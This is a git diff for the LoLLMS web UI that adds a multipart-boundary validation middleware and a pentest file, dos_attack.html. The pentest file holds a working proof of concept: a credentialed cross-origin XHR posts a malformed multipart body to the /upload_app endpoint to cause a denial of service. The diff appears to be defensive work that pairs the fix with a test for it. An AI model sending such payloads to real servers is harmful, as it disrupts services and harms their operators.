diff --git a/app.py b/app.py
index 926f2d44..9e5b393d 100644
--- a/app.py
+++ b/app.py
@@ -89,7 +89,7 @@ from lollms.app import LollmsApplication
 from lollms.paths import LollmsPaths
 from lollms.main_config import LOLLMSConfig
 from lollms.utilities import trace_exception
-from lollms.security import sanitize_path
+from lollms.security import sanitize_path, MultipartBoundaryCheck
 from lollms_webui import LOLLMSWebUI
 from pathlib import Path
 from ascii_colors import ASCIIColors
@@ -124,6 +124,9 @@ def get_ip_addresses():
 app = FastAPI(title="LoLLMS", description="This is the LoLLMS-Webui API documentation")
 
 
+# Add the MultipartBoundaryCheck middleware
+app.add_middleware(MultipartBoundaryCheck)
+
 
 #app.mount("/socket.io", StaticFiles(directory="path/to/socketio.js"))
 
diff --git a/lollms_core b/lollms_core
index 39ca9834..ab739e64 160000
--- a/lollms_core
+++ b/lollms_core
@@ -1 +1 @@
-Subproject commit 39ca9834901b2dc57fb781a6d0aab787afb0491a
+Subproject commit ab739e640f3382860a491a156ad1d319c01bbfd6
diff --git a/tests/pentests/multipart_dos/dos_attack.html b/tests/pentests/multipart_dos/dos_attack.html
new file mode 100644
index 00000000..868e35ae
--- /dev/null
+++ b/tests/pentests/multipart_dos/dos_attack.html
@@ -0,0 +1,29 @@
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <script>
+      function submitRequest() {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost:9600/upload_app", true);
+        xhr.setRequestHeader("Accept", "application/json, text/plain, */*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30672353603658029961121811124");
+        xhr.withCredentials = true;
+        var body = "\r\n" + 
+          "-----------------------------30672353603658029961121811124\r\n" + 
+          "Content-Disposition: form-data; name=\"file\"; filename=\"M1F1-Alaw-AFsp.wav\"\r\n" + 
+          "Content-Type: audio/wav\r\n" + 
+          "\r\n" + 
+          "dsadsdsa\r\n" + 
+          "-----------------------------30672353603658029961121811124--Random-Characters-Or-Integers-Start-From-H-re9786452315697846512978645231569784651297864523156978465129786452315697846512978645231569784651297864523156978465129786452315697846512978645231569784651297864523156978465129786452";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>